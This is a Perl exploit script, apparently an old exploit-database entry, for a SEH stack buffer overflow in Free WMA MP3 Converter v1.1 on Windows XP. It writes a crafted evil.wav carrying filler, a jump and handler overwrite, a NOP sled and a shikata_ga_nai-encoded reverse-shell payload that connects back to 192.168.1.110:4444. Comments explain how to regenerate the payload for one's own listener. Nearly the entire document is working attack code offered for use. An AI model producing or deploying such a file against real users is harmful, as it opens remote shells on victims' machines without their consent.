
# Title : Free WMA MP3 Converter v1.1 (.wav) Local Buffer Overflow
# Published : 2009-10-09
# Author : KriPpLer


#!/usr/bin/perl
#
############################################
# Free WMA MP3 Converter v1.1 (.wav) Local Buffer Overflow [seh]
# Vendor: http://www.eusing.com/
# Discovered by: KriPpLer 
# http://www.x-sploited.com/
# Tested on: Windows XP Pro SP2.
############################################

# Description: 

# FREE WMA MP3 converter v1.1 Local Buffer Overflow Exploit (SEH)

# This application is vulnerable to a stack buffer overflow when it converts
# a malformed .wav file: an oversized input overwrites the SEH record, which
# allows arbitrary code execution with the privileges of the user running
# the converter (the user has to open the crafted file and start a conversion).

# 1) Open Free WMA MP3 Converter
# 2) Select an output path in settings
# 3) Load the specially crafted evil.wav file
# 4) click Start...

# windows/shell_reverse_tcp - 341 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LHOST=192.168.1.110, EXITFUNC=seh, LPORT=4444
# (the embedded payload connects back to that address/port; regenerate it for
#  your own listener instead of patching the encoded bytes)

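use strict;
use warnings;

# Encoded payload (windows/shell_reverse_tcp, x86/shikata_ga_nai, 341 bytes)
# as listed in the header above. The listing had lost its backslashes
# ("xb8x1f..." is a plain 6-character string in Perl), which made the file
# layout below meaningless; the \x escapes are restored here so that each
# pair of hex digits is one byte.
#
# The connect-back host/port (192.168.1.110:4444) are baked into the encoded
# blob; do not hand-edit bytes in it, regenerate the payload with your own
# LHOST/LPORT and paste the new listing here.
my $shellcode =
"\xb8\x1f\xcb\x50\x0c\xdb\xce\x29\xc9\xd9\x74\x24\xf4\xb1" .
"\x4f\x5b\x31\x43\x14\x03\x43\x14\x83\xc3\x04\xfd\x3e\xac" .
"\xe4\x88\xc1\x4d\xf5\xea\x48\xa8\xc4\x38\x2e\xb8\x75\x8c" .
"\x24\xec\x75\x67\x68\x05\x0d\x05\xa5\x2a\xa6\xa3\x93\x05" .
"\x37\x02\x1c\xc9\xfb\x05\xe0\x10\x28\xe5\xd9\xda\x3d\xe4" .
"\x1e\x06\xcd\xb4\xf7\x4c\x7c\x28\x73\x10\xbd\x49\x53\x1e" .
"\xfd\x31\xd6\xe1\x8a\x8b\xd9\x31\x22\x80\x92\xa9\x48\xce" .
"\x02\xcb\x9d\x0d\x7e\x82\xaa\xe5\xf4\x15\x7b\x34\xf4\x27" .
"\x43\x9a\xcb\x87\x4e\xe3\x0c\x2f\xb1\x96\x66\x53\x4c\xa0" .
"\xbc\x29\x8a\x25\x21\x89\x59\x9d\x81\x2b\x8d\x7b\x41\x27" .
"\x7a\x08\x0d\x24\x7d\xdd\x25\x50\xf6\xe0\xe9\xd0\x4c\xc6" .
"\x2d\xb8\x17\x67\x77\x64\xf9\x98\x67\xc0\xa6\x3c\xe3\xe3" .
"\xb3\x46\xae\x6b\x77\x74\x51\x6c\x1f\x0f\x22\x5e\x80\xbb" .
"\xac\xd2\x49\x65\x2a\x14\x60\xd1\xa4\xeb\x8b\x21\xec\x2f" .
"\xdf\x71\x86\x86\x60\x1a\x56\x26\xb5\x8c\x06\x88\x66\x6c" .
"\xf7\x68\xd7\x04\x1d\x67\x08\x34\x1e\xad\x3f\x73\x89\x8e" .
"\xe8\x7a\x24\x67\xeb\x7c\xa9\x2b\x62\x9a\xa3\xc3\x22\x35" .
"\x5c\x7d\x6f\xcd\xfd\x82\xa5\x45\x9d\x11\x22\x95\xe8\x09" .
"\xfd\xc2\xbd\xfc\xf4\x86\x53\xa6\xae\xb4\xa9\x3e\x88\x7c" .
"\x76\x83\x17\x7d\xfb\xbf\x33\x6d\xc5\x40\x78\xd9\x99\x16" .
"\xd6\xb7\x5f\xc1\x98\x61\x36\xbe\x72\xe5\xcf\x8c\x44\x73" .
"\xd0\xd8\x32\x9b\x61\xb5\x02\xa4\x4e\x51\x83\xdd\xb2\xc1" .
"\x6c\x34\x77\xff\x9d\x84\x62\x68\x04\x7d\xcf\xf4\xb7\xa8" .
"\x0c\x01\x34\x58\xed\xf6\x24\x29\xe8\xb3\xe2\xc2\x80\xac" .
"\x86\xe4\x37\xcc\x82";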

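# File layout written to evil.wav:
#
#   [junk * 4116][nextseh (4)][newseh (4)][nops * 24][shellcode (341)]
#
# 4116 bytes of filler reach the SEH record on the stack. The first four
# bytes land in the "next SEH" pointer, the following four in the handler
# pointer. When the handler is invoked it returns into the nextseh bytes,
# which jump forward over the handler slot into the nop sled.

my $garbage = "A" x 4116;                  # filler up to the SEH record

# \xeb\x06 = "jmp short +6": skips the two trailing nops and the 4-byte
# handler pointer, landing on the first byte of the nop sled.
my $nextseh = "\xeb\x06\x90\x90";

# Handler pointer, little-endian. 0x1001BD04 is given as a pop/pop/ret
# sequence in lame_enc.dll; it is only valid for the DLL build tested
# (Windows XP Pro SP2, see header) and should be re-verified in a debugger
# before use on any other version of the product.
my $newseh = pack('V', 0x1001BD04);

my $nops   = "\x90" x 24;                  # nop sled before the payload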

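my $scode = $shellcode;                     # encoded payload defined above

# The output is raw binary: use a three-argument open with a lexical handle,
# fail loudly if the file cannot be created, and switch the handle to binary
# mode so that no text-mode newline translation can alter payload bytes
# (this matters when the script is run on Windows).
my $outfile = 'evil.wav';
open(my $fh, '>', $outfile) or die "Cannot create $outfile: $!\n";
binmode($fh);

# NOTE(review): the banner names "Free Wav to Wma Converter", while the
# target documented above is "Free WMA MP3 Converter v1.1"; left unchanged.
my $info = "\r\n====================================\n";
$info = $info . "Free Wav to Wma Converter v1.1\n";
$info = $info . "Local Buffer Overflow Exploit \n";
$info = $info . "Author: KriPpLer\n";
$info = $info . "http://www.x-sploited.com/\n";
$info = $info . "====================================\r\n\r\n";
$info = $info . "Usage: ./wmacon.pl\r\n\r\n";

print $info;

print {$fh} $garbage . $nextseh . $newseh . $nops . $scode;

# Buffered write errors only surface at close; a silent failure here would
# leave a truncated file that crashes the target without running the payload.
close($fh) or die "Error writing $outfile: $!\n";

print "[*] evil.wav file created successfully...\r\n";
exit;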